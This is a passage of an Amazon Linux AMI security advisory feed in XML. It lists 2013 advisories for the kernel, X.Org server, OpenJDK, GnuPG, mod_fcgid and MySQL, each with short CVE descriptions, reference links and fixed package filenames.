</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4398" title="" id="CVE-2012-4398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2141" title="" id="CVE-2013-2141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4162" title="" id="CVE-2013-4162" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4299" title="" id="CVE-2013-4299" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4387" title="" id="CVE-2013-4387" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package 
name="kernel-devel" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.66" release="55.43.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.66-55.43.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-234</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-234: important priority package update for xorg-x11-server</title><issued date="2013-10-23 15:21:00" /><updated date="2014-09-16 21:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4396:
A use-after-free flaw was found in the way the X.Org server handled ImageText requests. A malicious, authorized client could use this flaw to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4396" title="" id="CVE-2013-4396" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1426.html" title="" id="RHSA-2013:1426" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xephyr" version="1.13.0" release="11.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.13.0-11.18.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.13.0" release="11.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.13.0-11.18.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.13.0" release="11.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.13.0-11.18.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.13.0" release="11.18.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.13.0-11.18.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.13.0" release="11.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.13.0-11.18.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.13.0" release="11.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.13.0-11.18.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.13.0" release="11.18.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.13.0-11.18.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.13.0" release="11.18.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.13.0-11.18.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.13.0" release="11.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.13.0-11.18.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.13.0" release="11.18.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.13.0-11.18.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.13.0" release="11.18.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.13.0-11.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-235</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-235: critical priority package update for java-1.7.0-openjdk</title><issued date="2013-10-23 15:22:00" /><updated date="2014-09-16 21:45:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5851:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5850:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5849:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5842:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5840:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5838:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5830:
The class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine.
CVE-2013-5829:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5825:
Multiple errors were discovered in the way the JAXP and Security components process XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-5823:
Multiple errors were discovered in the way the JAXP and Security components process XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-5820:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5817:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5814:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5809:
Multiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.
CVE-2013-5804:
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.
CVE-2013-5803:
The Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit.
CVE-2013-5802:
The FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions.
CVE-2013-5800:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5797:
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.
CVE-2013-5790:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5784:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5783:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5782:
Multiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine.
CVE-2013-5780:
Various OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data.
CVE-2013-5778:
It was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory.
CVE-2013-5774:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5772:
The Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks.
CVE-2013-4002:
Multiple errors were discovered in the way the JAXP and Security components process XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-3829:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3829" title="" id="CVE-2013-3829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002" title="" id="CVE-2013-4002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5772" title="" id="CVE-2013-5772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5774" title="" id="CVE-2013-5774" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5778" title="" id="CVE-2013-5778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5780" title="" id="CVE-2013-5780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5782" title="" id="CVE-2013-5782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5783" title="" id="CVE-2013-5783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5784" title="" id="CVE-2013-5784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5790" title="" id="CVE-2013-5790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5797" title="" id="CVE-2013-5797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5800" title="" id="CVE-2013-5800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5802" title="" id="CVE-2013-5802" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5803" title="" id="CVE-2013-5803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5804" title="" id="CVE-2013-5804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5809" title="" id="CVE-2013-5809" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5814" title="" id="CVE-2013-5814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5817" title="" id="CVE-2013-5817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5820" title="" id="CVE-2013-5820" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5823" title="" id="CVE-2013-5823" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5825" title="" id="CVE-2013-5825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5829" title="" id="CVE-2013-5829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5830" title="" id="CVE-2013-5830" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5838" title="" id="CVE-2013-5838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5840" title="" id="CVE-2013-5840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5842" title="" id="CVE-2013-5842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5849" title="" id="CVE-2013-5849" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5850" title="" id="CVE-2013-5850" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5851" title="" id="CVE-2013-5851" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1451.html" title="" id="RHSA-2013:1451" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.2.32.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" 
version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.2.32.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.45-2.4.3.2.32.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.2.32.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.2.32.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.2.32.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.2.32.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.2.32.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.45-2.4.3.2.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-236</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-236: medium priority package update for gnupg</title><issued date="2013-10-23 15:23:00" /><updated date="2014-09-16 21:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4402:
1015685:
CVE-2013-4402 GnuPG: infinite recursion in the compressed packet parser DoS
CVE-2013-4351:
GnuPG 1.4.x, 2.0.x, and 2.1.x treats a key flags subpacket with all bits cleared (no usage permitted) as if it has all bits set (all usage permitted), which might allow remote attackers to bypass intended cryptographic protection mechanisms by leveraging the subkey.
1010137:
CVE-2013-4351 gnupg: treats no-usage-permitted keys as all-usages-permitted
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4351" title="" id="CVE-2013-4351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4402" title="" id="CVE-2013-4402" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg" version="1.4.15" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.15-1.21.amzn1.x86_64.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.15" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.15-1.21.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.15" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.15-1.21.amzn1.i686.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.15" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.15-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-237</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-237: medium priority package update for gnupg2</title><issued date="2013-10-23 15:24:00" /><updated date="2014-09-16 21:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4402:
1015685:
CVE-2013-4402 GnuPG: infinite recursion in the compressed packet parser DoS
CVE-2013-4351:
GnuPG 1.4.x, 2.0.x, and 2.1.x treats a key flags subpacket with all bits cleared (no usage permitted) as if it has all bits set (all usage permitted), which might allow remote attackers to bypass intended cryptographic protection mechanisms by leveraging the subkey.
1010137:
CVE-2013-4351 gnupg: treats no-usage-permitted keys as all-usages-permitted
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4351" title="" id="CVE-2013-4351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4402" title="" id="CVE-2013-4402" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg2" version="2.0.22" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.22-1.24.amzn1.x86_64.rpm</filename></package><package name="gnupg2-smime" version="2.0.22" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.22-1.24.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.22" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.22-1.24.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.22" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.22-1.24.amzn1.i686.rpm</filename></package><package name="gnupg2-smime" version="2.0.22" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.22-1.24.amzn1.i686.rpm</filename></package><package name="gnupg2" version="2.0.22" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.22-1.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-238</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-238: important priority package update for mod_fcgid</title><issued date="2013-10-23 15:26:00" /><updated date="2014-09-16 21:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4365:
1017039:
CVE-2013-4365 mod_fcgid: heap overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4365" title="" id="CVE-2013-4365" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_fcgid" version="2.3.9" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_fcgid-2.3.9-1.6.amzn1.x86_64.rpm</filename></package><package name="mod_fcgid-debuginfo" version="2.3.9" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_fcgid-debuginfo-2.3.9-1.6.amzn1.x86_64.rpm</filename></package><package name="mod_fcgid-debuginfo" version="2.3.9" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod_fcgid-debuginfo-2.3.9-1.6.amzn1.i686.rpm</filename></package><package name="mod_fcgid" version="2.3.9" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod_fcgid-2.3.9-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-239</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-239: important priority package update for mod24_fcgid</title><issued date="2013-10-23 15:26:00" /><updated date="2014-09-16 21:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4365:
1017039:
CVE-2013-4365 mod_fcgid: heap overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4365" title="" id="CVE-2013-4365" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_fcgid" version="2.3.9" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_fcgid-2.3.9-1.7.amzn1.x86_64.rpm</filename></package><package name="mod24_fcgid-debuginfo" version="2.3.9" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_fcgid-debuginfo-2.3.9-1.7.amzn1.x86_64.rpm</filename></package><package name="mod24_fcgid-debuginfo" version="2.3.9" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_fcgid-debuginfo-2.3.9-1.7.amzn1.i686.rpm</filename></package><package name="mod24_fcgid" version="2.3.9" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_fcgid-2.3.9-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-240</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-240: low priority package update for mysql51</title><issued date="2013-11-03 12:08:00" /><updated date="2014-09-16 21:49:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-3839:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.70 and earlier, 5.5.32 and earlier, and 5.6.12 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1019978:
CVE-2013-3839 mysql: unspecified DoS related to Optimizer (CPU October 2013)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3839" title="" id="CVE-2013-3839" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql51-common" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.72" release="1.64.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql51-embedded-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-bench" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.72-1.64.amzn1.i686.rpm</filename></package><package 